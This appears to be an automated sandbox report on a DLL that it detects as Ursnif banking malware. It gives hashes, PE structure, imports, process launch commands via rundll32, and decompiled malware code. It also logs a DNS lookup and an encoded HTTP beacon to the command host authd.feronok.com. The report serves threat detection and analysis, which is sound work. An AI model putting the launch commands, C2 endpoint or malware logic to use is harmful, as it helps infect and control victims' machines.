            MD5:05B04A30B7A55791319C4F71771CF16A
            SHA1:2C6404B854340AB4675377DA01707CD122A8B0CF
            SHA-256:589607C9B026909DF546D1EC625408F36A64662A30971317540738E6FF09F154
            SHA-512:7822A4FB8477CA20F1F15787DAB449BEBE39D8C97E1A855008A9FF79386906CFE6195165750F11AE7C79FC0A54ECDCF47AC8EE106E4E8898EBB09F935DAD0353
            Malicious:false
            C:\Users\user\AppData\Local\Temp\~DF80E1CCC67DA5CD93.TMP
            Process:C:\Program Files\internet explorer\iexplore.exe
            File Type:data
            Category:dropped
            Size (bytes):40169
            Entropy (8bit):0.6776367657920739
            Encrypted:false
            SSDEEP:192:kBqoxKAuqR+eYSbIZL7fj4rL7fj48L7fj4p:kBqoxKAuqR+eYSbIZLj6LjFLjm
            MD5:BB6D7F6068DA37F8EAC557E8224E9DA4
            SHA1:FB0E3897C467217EF4BCD46E8E22723E28A734C9
            SHA-256:2E68651AAB4451D174A526B8DC3C253810F8DBF4848C0AECBAAF4E167E84D035
            SHA-512:A5D8DF746DFABA3F048E3A63EA10773395670DBAEDFEF3E49E6684ED73374C55E0B6670D39D8635CBE97E5DE606E3D8307854624D3E3542999E49FA732EF6946
            Malicious:false

            Static File Info

            General

            File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
            Entropy (8bit):5.674513513570937
            TrID:
            • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
            • Generic Win/DOS Executable (2004/3) 0.20%
            • DOS Executable Generic (2002/1) 0.20%
            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
            File name:SecuriteInfo.com..7135.dll
            File size:886272
            MD5:5ba7ac7fa4f9e831679832b6cc22aee8
            SHA1:813df24ac22c2666b28bc3e7fb9bd1eef2a7f395
            SHA256:d2c19ac3eace29239bf919c442556abf782da5953325ee6b2626482fbf442f29
            SHA512:a345b0749d5745640fd7908cdb142960da22ac6029bafddc0666d11eb5033756c3cfde84d2fb94dcbf418df40d2ce49ec4a18b919714402b7045b96e619a27cd
            SSDEEP:24576:Ydk22FB2tfgklpVM5HdBcvLrXmF63WaSc:YdkDT29zaVg3WaSc
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~];V:<U.:<U.:<U.....><U.....;<U.7n..<<U.7n..+<U.7n..+<U.7n..,<U.....1<U.:<T.c=U.7n...<U.7n..;<U.7n..;<U.7n..;<U.Rich:<U........

            File Icon

            Icon Hash:74f0e4ecccdce0e4

            Static PE Info

            General

            Entrypoint:0x105cab1
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x1000000
            Subsystem:windows gui
            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
            Time Stamp:0x538835D4 [Fri May 30 07:40:04 2014 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:6
            OS Version Minor:0
            File Version Major:6
            File Version Minor:0
            Subsystem Version Major:6
            Subsystem Version Minor:0
            Import Hash:1bcf1a17040e578ef3e6fe0888b5a0a4

            Entrypoint Preview

            Instruction
            push ebp
            mov ebp, esp
            cmp dword ptr [ebp+0Ch], 01h
            jne 00007FD318806407h
            call 00007FD31880F0BFh
            push dword ptr [ebp+10h]
            push dword ptr [ebp+0Ch]
            push dword ptr [ebp+08h]
            call 00007FD31880640Ch
            add esp, 0Ch
            pop ebp
            retn 000Ch
            push 0000000Ch
            push 010D37B8h
            call 00007FD31880A895h
            xor eax, eax
            inc eax
            mov esi, dword ptr [ebp+0Ch]
            test esi, esi
            jne 00007FD31880640Eh
            cmp dword ptr [010D5608h], esi
            je 00007FD3188064EAh
            and dword ptr [ebp-04h], 00000000h
            cmp esi, 01h
            je 00007FD318806407h
            cmp esi, 02h
            jne 00007FD318806437h
            mov ecx, dword ptr [010028F0h]
            test ecx, ecx
            je 00007FD31880640Eh
            push dword ptr [ebp+10h]
            push esi
            push dword ptr [ebp+08h]
            call ecx
            mov dword ptr [ebp-1Ch], eax
            test eax, eax
            je 00007FD3188064B7h
            push dword ptr [ebp+10h]
            push esi
            push dword ptr [ebp+08h]
            call 00007FD318806216h
            mov dword ptr [ebp-1Ch], eax
            test eax, eax
            je 00007FD3188064A0h
            mov ebx, dword ptr [ebp+10h]
            push ebx
            push esi
            push dword ptr [ebp+08h]
            call 00007FD31882841Fh
            mov edi, eax
            mov dword ptr [ebp-1Ch], edi
            cmp esi, 01h
            jne 00007FD31880642Ah
            test edi, edi
            jne 00007FD318806426h
            push ebx
            push eax
            push dword ptr [ebp+08h]
            call 00007FD318828407h
            push ebx
            push edi
            push dword ptr [ebp+08h]
            call 00007FD3188061DCh
            mov eax, dword ptr [010028F0h]
            test eax, eax
            je 00007FD318806409h
            push ebx
            push edi
            push dword ptr [ebp+08h]
            call eax

            Rich Headers

            Programming Language:
            • [EXP] VS2013 build 21005
            • [IMP] VS2013 build 21005
            • [ C ] VS2013 build 21005
            • [C++] VS2013 build 21005
            • [LNK] VS2013 build 21005
            • [ASM] VS2013 build 21005
            • [RES] VS2013 build 21005

            Data Directories

            Name | Virtual Address | Virtual Size | Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT | 0xd3e20 | 0x5b | .text
            IMAGE_DIRECTORY_ENTRY_IMPORT | 0xec1e8 | 0x50 | .idata
            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xed000 | 0x518 | .rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xee000 | 0x270c | .reloc
            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x1050 | 0x38 | .text
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x59ae0 | 0x40 | .text
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_IAT | 0xec000 | 0x1e8 | .idata
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

            Sections

            Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
            .text | 0x1000 | 0xd2e7b | 0xd3000 | False | 0.615229746742 | data | 5.64357184369 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            .data | 0xd4000 | 0x1782c | 0x1600 | False | 0.347478693182 | data | 3.91320304109 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
            .idata | 0xec000 | 0xd0e | 0xe00 | False | 0.430803571429 | data | 5.29299062625 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .rsrc | 0xed000 | 0x518 | 0x600 | False | 0.381510416667 | data | 2.93540035637 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .reloc | 0xee000 | 0x270c | 0x2800 | False | 0.7810546875 | data | 6.65386529971 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

            Resources

            Name | RVA | Size | Type | Language | Country
            RT_STRING | 0xed3c0 | 0x156 | data | English | United States
            RT_VERSION | 0xed0a0 | 0x320 | data | English | United States

            Imports

            DLL | Import
            KERNEL32.dll | GetSystemTime, GetTempPathA, GetVersionExA, GetCurrentDirectoryA, VirtualProtect, FindFirstChangeNotificationA, GetModuleHandleA, LockResource, GetEnvironmentVariableA, GetVolumeInformationA, OpenProcess, GetDateFormatA, QueryPerformanceCounter, FindResourceA, CreateFileA, EncodePointer, DecodePointer, GetCommandLineA, GetCurrentThreadId, RaiseException, RtlUnwind, IsDebuggerPresent, IsProcessorFeaturePresent, EnterCriticalSection, LeaveCriticalSection, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetLastError, SetLastError, GetCurrentThread, MultiByteToWideChar, ExitProcess, GetModuleHandleExW, GetProcAddress, AreFileApisANSI, WideCharToMultiByte, HeapSize, HeapFree, HeapAlloc, GetProcessHeap, GetStdHandle, GetFileType, DeleteCriticalSection, GetStartupInfoW, GetModuleFileNameA, GetCurrentProcessId, GetSystemTimeAsFileTime, GetEnvironmentStringsW, FreeEnvironmentStringsW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, InitializeCriticalSectionAndSpinCount, CreateEventW, Sleep, GetCurrentProcess, TerminateProcess, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetTickCount, GetModuleHandleW, CreateSemaphoreW, FatalAppExitA, GetStringTypeW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetDateFormatW, GetTimeFormatW, CompareStringW, LCMapStringW, WriteFile, GetModuleFileNameW, SetConsoleCtrlHandler, FreeLibrary, LoadLibraryExW, HeapReAlloc, FlushFileBuffers, GetConsoleCP, GetConsoleMode, SetFilePointerEx, OutputDebugStringW, CloseHandle, SetStdHandle, WriteConsoleW, CreateFileW
            ADVAPI32.dll | RegisterServiceCtrlHandlerA, RegOpenKeyExA, LookupPrivilegeValueA, SetSecurityDescriptorDacl, InitializeSecurityDescriptor, CreateServiceA, RegQueryValueExA, RegSetValueExA, GetTokenInformation, RegCloseKey, AdjustTokenPrivileges, RegEnumKeyA, ControlService, FreeSid, SetServiceStatus, CloseServiceHandle, OpenProcessToken, StartServiceCtrlDispatcherA, DeleteService, SetEntriesInAclA, AllocateAndInitializeSid
            COMCTL32.dll | DestroyPropertySheetPage, ImageList_SetOverlayImage, ImageList_Destroy, ImageList_Add, CreateToolbarEx, PropertySheetA

            Exports

            Name | Ordinal | Address
            Paragraphbell | 1 | 0x107f020
            Sharptwo | 2 | 0x107e9f0

            Version Infos

            Description | Data
            LegalCopyright | Too far Corporation. All rights reserved
            InternalName | Captain apple
            FileVersion | 0.3.8.218 Couldbaby
            CompanyName | Too far Corporation
            ProductName | Too far Feelsaw
            ProductVersion | 0.3.8.218
            FileDescription | Too far Feelsaw
            OriginalFilename | Son.dll
            Translation | 0x0409 0x04b0

            Possible Origin

            Language of compilation system | Country where language is spoken | Map
            English | United States |

            Network Behavior

            Network Port Distribution

            TCP Packets

            Timestamp | Source Port | Dest Port | Source IP | Dest IP
            Jun 10, 2021 22:50:53.780543089 CEST | 49748 | 80 | 192.168.2.3 | 185.233.80.31
            Jun 10, 2021 22:50:53.781248093 CEST | 49749 | 80 | 192.168.2.3 | 185.233.80.31
            Jun 10, 2021 22:50:53.824312925 CEST | 80 | 49748 | 185.233.80.31 | 192.168.2.3
            Jun 10, 2021 22:50:53.824376106 CEST | 80 | 49749 | 185.233.80.31 | 192.168.2.3
            Jun 10, 2021 22:50:53.824549913 CEST | 49748 | 80 | 192.168.2.3 | 185.233.80.31
            Jun 10, 2021 22:50:53.824747086 CEST | 49749 | 80 | 192.168.2.3 | 185.233.80.31
            Jun 10, 2021 22:50:53.826638937 CEST | 49748 | 80 | 192.168.2.3 | 185.233.80.31
            Jun 10, 2021 22:50:53.914755106 CEST | 80 | 49748 | 185.233.80.31 | 192.168.2.3
            Jun 10, 2021 22:50:54.366725922 CEST | 80 | 49748 | 185.233.80.31 | 192.168.2.3
            Jun 10, 2021 22:50:54.366909027 CEST | 49748 | 80 | 192.168.2.3 | 185.233.80.31
            Jun 10, 2021 22:50:54.368772030 CEST | 49748 | 80 | 192.168.2.3 | 185.233.80.31
            Jun 10, 2021 22:50:54.411453009 CEST | 80 | 49748 | 185.233.80.31 | 192.168.2.3
            Jun 10, 2021 22:50:56.019642115 CEST | 49749 | 80 | 192.168.2.3 | 185.233.80.31

            UDP Packets

            Timestamp | Source Port | Dest Port | Source IP | Dest IP
            Jun 10, 2021 22:48:53.817890882 CEST | 53 | 60100 | 8.8.8.8 | 192.168.2.3
            Jun 10, 2021 22:48:54.483824015 CEST | 53195 | 53 | 192.168.2.3 | 8.8.8.8
            Jun 10, 2021 22:48:54.544796944 CEST | 53 | 53195 | 8.8.8.8 | 192.168.2.3
            Jun 10, 2021 22:48:55.423032045 CEST | 50141 | 53 | 192.168.2.3 | 8.8.8.8
            Jun 10, 2021 22:48:55.473484039 CEST | 53 | 50141 | 8.8.8.8 | 192.168.2.3
            Jun 10, 2021 22:48:56.358875036 CEST | 53023 | 53 | 192.168.2.3 | 8.8.8.8
            Jun 10, 2021 22:48:56.409626007 CEST | 53 | 53023 | 8.8.8.8 | 192.168.2.3
            Jun 10, 2021 22:48:57.242597103 CEST | 49563 | 53 | 192.168.2.3 | 8.8.8.8
            Jun 10, 2021 22:48:57.296063900 CEST | 53 | 49563 | 8.8.8.8 | 192.168.2.3
            Jun 10, 2021 22:48:58.168931007 CEST | 51352 | 53 | 192.168.2.3 | 8.8.8.8
            Jun 10, 2021 22:48:58.219233036 CEST | 53 | 51352 | 8.8.8.8 | 192.168.2.3
            Jun 10, 2021 22:48:59.328725100 CEST | 59349 | 53 | 192.168.2.3 | 8.8.8.8
            Jun 10, 2021 22:48:59.378864050 CEST | 53 | 59349 | 8.8.8.8 | 192.168.2.3
            Jun 10, 2021 22:49:00.218533039 CEST | 57084 | 53 | 192.168.2.3 | 8.8.8.8
            Jun 10, 2021 22:49:00.268677950 CEST | 53 | 57084 | 8.8.8.8 | 192.168.2.3
            Jun 10, 2021 22:49:01.448626995 CEST | 58823 | 53 | 192.168.2.3 | 8.8.8.8
            Jun 10, 2021 22:49:01.498785973 CEST | 53 | 58823 | 8.8.8.8 | 192.168.2.3
            Jun 10, 2021 22:49:42.156111002 CEST | 57568 | 53 | 192.168.2.3 | 8.8.8.8
            Jun 10, 2021 22:49:42.245258093 CEST | 53 | 57568 | 8.8.8.8 | 192.168.2.3
            Jun 10, 2021 22:49:51.908005953 CEST | 50540 | 53 | 192.168.2.3 | 8.8.8.8
            Jun 10, 2021 22:49:51.971951962 CEST | 53 | 50540 | 8.8.8.8 | 192.168.2.3
            Jun 10, 2021 22:49:53.067883968 CEST | 54366 | 53 | 192.168.2.3 | 8.8.8.8
            Jun 10, 2021 22:49:53.137187004 CEST | 53 | 54366 | 8.8.8.8 | 192.168.2.3
            Jun 10, 2021 22:50:05.169744968 CEST | 53034 | 53 | 192.168.2.3 | 8.8.8.8
            Jun 10, 2021 22:50:05.254148006 CEST | 53 | 53034 | 8.8.8.8 | 192.168.2.3
            Jun 10, 2021 22:50:08.353154898 CEST | 57762 | 53 | 192.168.2.3 | 8.8.8.8
            Jun 10, 2021 22:50:08.421194077 CEST | 53 | 57762 | 8.8.8.8 | 192.168.2.3
            Jun 10, 2021 22:50:27.186853886 CEST | 55435 | 53 | 192.168.2.3 | 8.8.8.8
            Jun 10, 2021 22:50:27.253873110 CEST | 53 | 55435 | 8.8.8.8 | 192.168.2.3
            Jun 10, 2021 22:50:44.954138041 CEST | 50713 | 53 | 192.168.2.3 | 8.8.8.8
            Jun 10, 2021 22:50:45.027595043 CEST | 53 | 50713 | 8.8.8.8 | 192.168.2.3
            Jun 10, 2021 22:50:48.981637001 CEST | 56132 | 53 | 192.168.2.3 | 8.8.8.8
            Jun 10, 2021 22:50:49.042764902 CEST | 53 | 56132 | 8.8.8.8 | 192.168.2.3
            Jun 10, 2021 22:50:52.026371956 CEST | 58987 | 53 | 192.168.2.3 | 8.8.8.8
            Jun 10, 2021 22:50:52.089713097 CEST | 53 | 58987 | 8.8.8.8 | 192.168.2.3
            Jun 10, 2021 22:50:53.411917925 CEST | 56579 | 53 | 192.168.2.3 | 8.8.8.8
            Jun 10, 2021 22:50:53.769078016 CEST | 53 | 56579 | 8.8.8.8 | 192.168.2.3
            Jun 10, 2021 22:50:58.710943937 CEST | 60633 | 53 | 192.168.2.3 | 8.8.8.8
            Jun 10, 2021 22:50:58.782740116 CEST | 53 | 60633 | 8.8.8.8 | 192.168.2.3
            Jun 10, 2021 22:50:59.185627937 CEST | 61292 | 53 | 192.168.2.3 | 8.8.8.8
            Jun 10, 2021 22:50:59.262943983 CEST | 53 | 61292 | 8.8.8.8 | 192.168.2.3

            DNS Queries

            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
            Jun 10, 2021 22:50:53.411917925 CEST | 192.168.2.3 | 8.8.8.8 | 0x6f8c | Standard query (0) | authd.feronok.com | A (IP address) | IN (0x0001)

            DNS Answers

            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
            Jun 10, 2021 22:50:05.254148006 CEST | 8.8.8.8 | 192.168.2.3 | 0xc900 | No error (0) | prda.aadg.msidentity.com | www.tm.a.prd.aadg.akadns.net | | CNAME (Canonical name) | IN (0x0001)
            Jun 10, 2021 22:50:53.769078016 CEST | 8.8.8.8 | 192.168.2.3 | 0x6f8c | No error (0) | authd.feronok.com | | 185.233.80.31 | A (IP address) | IN (0x0001)

            HTTP Request Dependency Graph

            • authd.feronok.com

            HTTP Packets

            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
            0 | 192.168.2.3 | 49748 | 185.233.80.31 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
            Timestamp | kBytes transferred | Direction | Data
            Jun 10, 2021 22:50:53.826638937 CEST | 4316 | OUT | GET /INsgiuDpuLw85PPWCNwmsmw/LyIcaMF9BW/RDuesN3193oziv6jZ/21yngUSJZxlB/5U99_2BFq39/C9yL3XEqjGdzvV/F4wrCEliEtubK_2BQN3v0/mpD0sYBWj1_2BOoZ/MhYNZMroasOcyRm/Y7cgiiYGTmIYClS1bt/R_2BrGpes/V0WKbm6yczDyoBvOW06Z/_2FVUJ_2BtBEMJQ2mZ0/eqMRxCIXxJwUIjVA7qTLlE/f_2FwC5tmUPbh/r76jmp6x/obp7g2x_2BpjxmD9q5fMhKl/Y1cOMUM_2F/x9ahGBENuH7csdR7_/2FySnpeWZizz/XD203nXIqoX/COsoX4qlT56/jcBfJkpo HTTP/1.1
            Accept: text/html, application/xhtml+xml, image/jxr, */*
            Accept-Language: en-US
            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
            Accept-Encoding: gzip, deflate
            Host: authd.feronok.com
            Connection: Keep-Alive
            Jun 10, 2021 22:50:54.366725922 CEST | 4317 | IN | HTTP/1.1 404 Not Found
            Server: nginx
            Date: Thu, 10 Jun 2021 20:50:54 GMT
            Content-Type: text/html; charset=utf-8
            Transfer-Encoding: chunked
            Connection: close
            Vary: Accept-Encoding
            Content-Encoding: gzip
            Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
            Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30


            Code Manipulations

            Statistics

            CPU Usage


            Memory Usage


            Behavior


            System Behavior

            General

            Start time:22:49:00
            Start date:10/06/2021
            Path:C:\Windows\System32\loaddll32.exe
            Wow64 process (32bit):true
            Commandline:loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com..7135.dll'
            Imagebase:0x830000
            File size:116736 bytes
            MD5 hash:542795ADF7CC08EFCF675D65310596E8
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Start time:22:49:00
            Start date:10/06/2021
            Path:C:\Windows\SysWOW64\cmd.exe
            Wow64 process (32bit):true
            Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com..7135.dll',#1
            Imagebase:0xbd0000
            File size:232960 bytes
            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Start time:22:49:01
            Start date:10/06/2021
            Path:C:\Windows\SysWOW64\rundll32.exe
            Wow64 process (32bit):true
            Commandline:rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com..7135.dll,Paragraphbell
            Imagebase:0x220000
            File size:61952 bytes
            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Start time:22:49:01
            Start date:10/06/2021
            Path:C:\Windows\SysWOW64\rundll32.exe
            Wow64 process (32bit):true
            Commandline:rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com..7135.dll',#1
            Imagebase:0x220000
            File size:61952 bytes
            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.430352092.0000000005A58000.00000004.00000040.sdmp, Author: Joe Security
            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000002.464198146.0000000005A58000.00000004.00000040.sdmp, Author: Joe Security
            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.430424986.0000000005A58000.00000004.00000040.sdmp, Author: Joe Security
            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.430241635.0000000005A58000.00000004.00000040.sdmp, Author: Joe Security
            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.430313705.0000000005A58000.00000004.00000040.sdmp, Author: Joe Security
            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.430450163.0000000005A58000.00000004.00000040.sdmp, Author: Joe Security
            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.430406711.0000000005A58000.00000004.00000040.sdmp, Author: Joe Security
            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.430285928.0000000005A58000.00000004.00000040.sdmp, Author: Joe Security
            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.430372927.0000000005A58000.00000004.00000040.sdmp, Author: Joe Security
            Reputation:high

            General

            Start time:22:49:05
            Start date:10/06/2021
            Path:C:\Windows\SysWOW64\rundll32.exe
            Wow64 process (32bit):true
            Commandline:rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com..7135.dll,Sharptwo
            Imagebase:0x220000
            File size:61952 bytes
            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Start time:22:50:51
            Start date:10/06/2021
            Path:C:\Program Files\internet explorer\iexplore.exe
            Wow64 process (32bit):false
            Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Imagebase:0x7ff7dea60000
            File size:823560 bytes
            MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Start time:22:50:52
            Start date:10/06/2021
            Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
            Wow64 process (32bit):true
            Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4456 CREDAT:17410 /prefetch:2
            Imagebase:0x8e0000
            File size:822536 bytes
            MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            Disassembly

            Code Analysis


              Executed Functions

              C-Code - Quality: 80%
              			E6E1C1C7D(intOrPtr _a4) {
              				char _v28;
              				struct _SYSTEMTIME _v44;
              				char _v48;
              				long _v52;
              				long _v56;
              				void* __edi;
              				long _t21;
              				int _t23;
              				long _t26;
              				long _t27;
              				long _t31;
              				intOrPtr _t39;
              				intOrPtr _t44;
              				signed int _t45;
              				void* _t50;
              				signed int _t54;
              				void* _t56;
              				intOrPtr* _t57;
              
              				_t21 = E6E1C1F10();
              				_v52 = _t21;
              				if(_t21 != 0) {
              					L18:
              					return _t21;
              				} else {
              					goto L1;
              				}
              				do {
              					L1:
              					GetSystemTime( &_v44);
              					_t23 = SwitchToThread();
              					asm("cdq");
              					_t45 = 9;
              					_t54 = _t23 + (_v44.wMilliseconds & 0x0000ffff) % _t45;
              					_t26 = E6E1C18AD(0, _t54); // executed
              					_v56 = _t26;
              					Sleep(_t54 << 5); // executed
              					_t21 = _v56;
              				} while (_t21 == 0xc);
              				if(_t21 != 0) {
              					goto L18;
              				}
              				_t27 = E6E1C1ADB(_t45);
              				_v52 = _t27;
              				if(_t27 != 0) {
              					L16:
              					_t21 = _v52;
              					if(_t21 == 0xffffffff) {
              						_t21 = GetLastError();
              					}
              					goto L18;
              				}
              				if(_a4 != 0) {
              					L11:
              					_push(0);
              					_t56 = E6E1C13D1(E6E1C14E8,  &_v28);
              					if(_t56 == 0) {
              						_v56 = GetLastError();
              					} else {
              						_t31 = WaitForSingleObject(_t56, 0xffffffff);
              						_v56 = _t31;
              						if(_t31 == 0) {
              							GetExitCodeThread(_t56,  &_v56);
              						}
              						CloseHandle(_t56);
              					}
              					goto L16;
              				}
              				if(E6E1C134F(_t45,  &_v48) != 0) {
              					 *0x6e1c41b8 = 0;
              					goto L11;
              				}
              				_t44 = _v48;
              				_t57 = __imp__GetLongPathNameW;
              				_t50 =  *_t57(_t44, 0, 0);
              				if(_t50 == 0) {
              					L9:
              					 *0x6e1c41b8 = _t44;
              					goto L11;
              				}
              				_t15 = _t50 + 2; // 0x2
              				_t39 = E6E1C1B58(_t50 + _t15);
              				 *0x6e1c41b8 = _t39;
              				if(_t39 == 0) {
              					goto L9;
              				} else {
              					 *_t57(_t44, _t39, _t50);
              					E6E1C142F(_t44);
              					goto L11;
              				}
              			}


              APIs
                • Part of subcall function 6E1C1F10: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E1C1C8E,74B063F0,00000000), ref: 6E1C1F1F
                • Part of subcall function 6E1C1F10: GetVersion.KERNEL32 ref: 6E1C1F2E
                • Part of subcall function 6E1C1F10: GetCurrentProcessId.KERNEL32 ref: 6E1C1F3D
                • Part of subcall function 6E1C1F10: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E1C1F56
              • GetSystemTime.KERNEL32(?,74B063F0,00000000), ref: 6E1C1CA1
              • SwitchToThread.KERNEL32 ref: 6E1C1CA7
                • Part of subcall function 6E1C18AD: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00000000), ref: 6E1C1903
                • Part of subcall function 6E1C18AD: memcpy.NTDLL(?,?,?,?,?,?,00000000), ref: 6E1C19C9
              • Sleep.KERNELBASE(00000000,00000000), ref: 6E1C1CCA
              • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 6E1C1D12
              • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 6E1C1D30
              • WaitForSingleObject.KERNEL32(00000000,000000FF,6E1C14E8,?,00000000), ref: 6E1C1D62
              • GetExitCodeThread.KERNEL32(00000000,?), ref: 6E1C1D76
              • CloseHandle.KERNEL32(00000000), ref: 6E1C1D7D
              • GetLastError.KERNEL32(6E1C14E8,?,00000000), ref: 6E1C1D85
              • GetLastError.KERNEL32 ref: 6E1C1D98
              Memory Dump Source
              • Source File: 00000000.00000002.460436552.000000006E1C1000.00000020.00020000.sdmp, Offset: 6E1C0000, based on PE: true
• Associated: 00000000.00000002.460428068.000000006E1C0000.00000002.00020000.sdmp
• Associated: 00000000.00000002.460462599.000000006E1C3000.00000002.00020000.sdmp
• Associated: 00000000.00000002.460478829.000000006E1C5000.00000004.00020000.sdmp
• Associated: 00000000.00000002.460501116.000000006E1C6000.00000002.00020000.sdmp
              Similarity
              • API ID: ErrorLastLongNamePathProcessThread$AllocCloseCodeCreateCurrentEventExitHandleObjectOpenSingleSleepSwitchSystemTimeVersionVirtualWaitmemcpy
              • String ID:
              • API String ID: 1962885430-0
              • Opcode ID: fdc9e92d1d465907f22880ace846725f18fdaa1e58afd678a08990da24bed37b
              • Instruction ID: 05e1698dc7c22bdfe323542b900fa9b2a15442dbdee2dd94200ac244c9319a58
              • Opcode Fuzzy Hash: fdc9e92d1d465907f22880ace846725f18fdaa1e58afd678a08990da24bed37b
              • Instruction Fuzzy Hash: B531A7726847419BC750DFE5884C9AF7AFDAFA6F58B104916F894C2140EB3CC489A7A3
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • VirtualAlloc.KERNELBASE(00000000,000006AB,00003000,00000040,000006AB,6E296BE0), ref: 6E297245
              • VirtualAlloc.KERNEL32(00000000,00000314,00003000,00000040,6E296C41), ref: 6E29727C
              • VirtualAlloc.KERNEL32(00000000,0000EC31,00003000,00000040), ref: 6E2972DC
              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E297312
